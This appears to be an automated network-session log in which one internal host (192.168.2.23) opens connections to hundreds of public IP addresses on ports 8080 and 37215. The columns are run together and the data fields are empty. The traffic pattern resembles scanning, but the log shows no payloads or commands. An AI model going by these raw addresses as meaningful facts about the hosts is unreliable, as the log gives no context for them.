                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17199192.168.2.2353834111.130.207.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17200192.168.2.235348498.102.29.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17201192.168.2.2346872213.20.111.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17202192.168.2.2355482125.41.236.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17203192.168.2.235185836.213.44.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17204192.168.2.233468239.105.157.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17205192.168.2.2342226133.83.113.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17206192.168.2.2345534199.146.229.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17207192.168.2.2354966188.211.109.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17208192.168.2.234954467.6.46.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17209192.168.2.2337656161.212.204.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17210192.168.2.2350310197.0.20.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17211192.168.2.2334104168.50.16.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17212192.168.2.2342102213.192.49.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17213192.168.2.234246642.12.200.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17214192.168.2.2348686172.129.34.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17215192.168.2.2337582157.75.165.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17216192.168.2.2359994197.15.169.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17217192.168.2.2356546146.53.233.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17218192.168.2.2341382157.22.252.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17219192.168.2.2355310157.117.70.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17220192.168.2.234181276.201.100.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17221192.168.2.2341234178.144.69.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17222192.168.2.235651225.193.150.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17223192.168.2.235931860.192.115.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17224192.168.2.2357638186.14.133.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17225192.168.2.2338590204.218.6.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17226192.168.2.2355626170.57.96.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17227192.168.2.2344212188.252.183.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17228192.168.2.234584859.109.167.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17229192.168.2.2339984175.170.165.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17230192.168.2.2340162117.149.15.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17231192.168.2.233997489.6.247.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17232192.168.2.2346062191.106.98.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17233192.168.2.2337680150.125.57.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17234192.168.2.2335158159.217.3.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17235192.168.2.2341392197.13.250.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17236192.168.2.235740841.188.114.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17237192.168.2.235537239.46.87.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17238192.168.2.234161618.7.189.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17239192.168.2.235610841.44.160.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17240192.168.2.235817241.96.138.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17241192.168.2.2333758112.30.76.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17242192.168.2.2344178188.148.193.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17243192.168.2.2340910157.149.253.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17244192.168.2.235653641.242.164.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17245192.168.2.2337250105.244.252.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17246192.168.2.2338622157.60.191.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17247192.168.2.2356120197.17.94.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17248192.168.2.235712841.170.74.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17249192.168.2.2337802129.13.2.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17250192.168.2.2342762157.65.181.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17251192.168.2.2352194197.183.205.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17252192.168.2.233495441.165.157.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17253192.168.2.2342460157.113.249.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17254192.168.2.2343556157.139.115.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17255192.168.2.2359822157.91.65.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17256192.168.2.2358542197.231.115.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17257192.168.2.2348996197.69.247.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17258192.168.2.235089241.53.218.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17259192.168.2.2347146157.97.122.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17260192.168.2.235940041.20.82.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17261192.168.2.2343516197.77.34.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17262192.168.2.235002697.26.148.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17263192.168.2.2358280157.128.160.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17264192.168.2.2353232157.25.84.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17265192.168.2.234728441.21.244.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17266192.168.2.235150641.117.152.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17267192.168.2.2346722157.143.166.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17268192.168.2.2347724157.209.161.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17269192.168.2.2343046197.31.191.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17270192.168.2.2357494157.104.233.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17271192.168.2.2360892197.5.32.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17272192.168.2.234843441.42.199.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17273192.168.2.2359256157.86.162.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17274192.168.2.233396441.31.220.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17275192.168.2.2357264157.2.131.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17276192.168.2.2348512197.119.13.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17277192.168.2.2345756157.18.133.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17278192.168.2.2351216197.177.96.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17279192.168.2.2347912137.101.29.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17280192.168.2.233938446.181.188.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17281192.168.2.2341292180.240.158.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17282192.168.2.2350662157.16.58.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17283192.168.2.2354404197.89.59.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17284192.168.2.2338110124.34.223.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17285192.168.2.2354622157.5.25.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17286192.168.2.234668241.205.182.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17287192.168.2.2337524197.14.90.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17288192.168.2.233699641.43.80.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17289192.168.2.2341158157.91.110.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17290192.168.2.234252841.105.168.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17291192.168.2.234151441.98.13.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17292192.168.2.2360210168.150.1.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17293192.168.2.235429859.234.123.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17294192.168.2.233280441.196.231.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17295192.168.2.234710050.253.81.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17296192.168.2.2333412197.155.40.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17297192.168.2.2360926197.52.168.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17298192.168.2.2335238220.137.151.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17299192.168.2.233709288.177.229.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17300192.168.2.2337052157.157.5.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17301192.168.2.2360940157.130.205.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17302192.168.2.2356112197.151.255.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17303192.168.2.2354056197.93.98.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17304192.168.2.235868817.236.50.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17305192.168.2.2345078157.116.223.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17306192.168.2.2358164208.217.77.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17307192.168.2.2354934157.145.28.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17308192.168.2.2358342157.236.103.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17309192.168.2.2341942173.96.0.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17310192.168.2.2357470197.253.195.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17311192.168.2.2343468157.187.200.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17312192.168.2.2359210157.29.140.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17313192.168.2.233677841.210.251.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17314192.168.2.2340196197.62.203.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17315192.168.2.2342108197.181.250.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17316192.168.2.2352958130.37.46.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17317192.168.2.23506802.201.119.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17318192.168.2.2360732197.55.14.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17319192.168.2.2338722157.48.51.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17320192.168.2.2349580157.26.195.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17321192.168.2.235049441.49.206.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17322192.168.2.2340098157.68.236.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17323192.168.2.2336702160.93.134.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17324192.168.2.2352234197.227.157.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17325192.168.2.235719278.200.240.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17326192.168.2.2341380157.107.183.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17327192.168.2.2359244159.198.210.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17328192.168.2.2340826197.219.113.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17329192.168.2.2337226197.212.220.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17330192.168.2.235928241.114.236.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17331192.168.2.235719041.176.66.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17332192.168.2.2355170157.80.125.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17333192.168.2.236003041.210.192.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17334192.168.2.233579441.129.235.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17335192.168.2.2346662112.169.102.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17336192.168.2.234364274.137.162.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17337192.168.2.2333422157.250.29.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17338192.168.2.2334196179.143.72.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17339192.168.2.233939841.14.168.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17340192.168.2.2357438197.133.52.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17341192.168.2.234282238.230.14.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17342192.168.2.2344390197.47.40.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17343192.168.2.235779241.89.239.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17344192.168.2.235762441.20.17.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17345192.168.2.2340232157.4.139.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17346192.168.2.2346214157.155.234.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17347192.168.2.2346298157.151.145.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17348192.168.2.235153441.43.74.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17349192.168.2.2343874167.132.101.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17350192.168.2.234545241.170.25.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17351192.168.2.2350370157.46.121.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17352192.168.2.233309241.239.151.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17353192.168.2.234887241.254.204.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17354192.168.2.2345146157.173.57.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17355192.168.2.2355992197.247.113.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17356192.168.2.2333198157.123.84.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17357192.168.2.233592063.189.224.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17358192.168.2.234409297.28.120.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17359192.168.2.2343534192.10.13.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17360192.168.2.235307841.75.76.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17361192.168.2.235842219.211.207.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17362192.168.2.234561241.82.3.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17363192.168.2.2358910157.216.116.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17364192.168.2.235567441.73.150.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17365192.168.2.233731641.133.212.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17366192.168.2.2344502197.109.192.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17367192.168.2.2343090197.255.214.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17368192.168.2.234818285.87.11.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17369192.168.2.234962641.221.72.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17370192.168.2.2349074131.79.229.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17371192.168.2.234760841.219.16.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17372192.168.2.235024241.179.19.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17373192.168.2.2338274197.82.30.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17374192.168.2.2334494197.246.210.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17375192.168.2.2356794197.198.158.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17376192.168.2.233785241.156.32.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17377192.168.2.233533441.132.112.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17378192.168.2.2357596157.46.18.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17379192.168.2.233382441.95.161.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17380192.168.2.233463441.190.146.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17381192.168.2.233554441.17.111.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17382192.168.2.233418227.34.48.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17383192.168.2.233834241.126.188.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17384192.168.2.2337606157.54.30.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17385192.168.2.2333334197.170.127.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17386192.168.2.2335628157.93.55.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17387192.168.2.2343792155.201.88.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17388192.168.2.2353200157.20.98.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17389192.168.2.2351476189.165.55.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17390192.168.2.2356440153.78.4.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17391192.168.2.2357280116.6.79.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17392192.168.2.2336680157.64.197.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17393192.168.2.2343298197.249.182.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17394192.168.2.234642841.235.250.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17395192.168.2.234400241.133.247.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17396192.168.2.2352624157.106.182.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17397192.168.2.235919041.247.156.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17398192.168.2.2333852218.74.38.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17399192.168.2.235940427.213.236.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17400192.168.2.2341140157.121.92.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17401192.168.2.2347072210.98.60.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17402192.168.2.2340862157.2.55.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17403192.168.2.233921041.160.111.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17404192.168.2.235355041.246.241.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17405192.168.2.236007041.107.198.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17406192.168.2.234491041.139.159.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17407192.168.2.2339292197.184.189.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
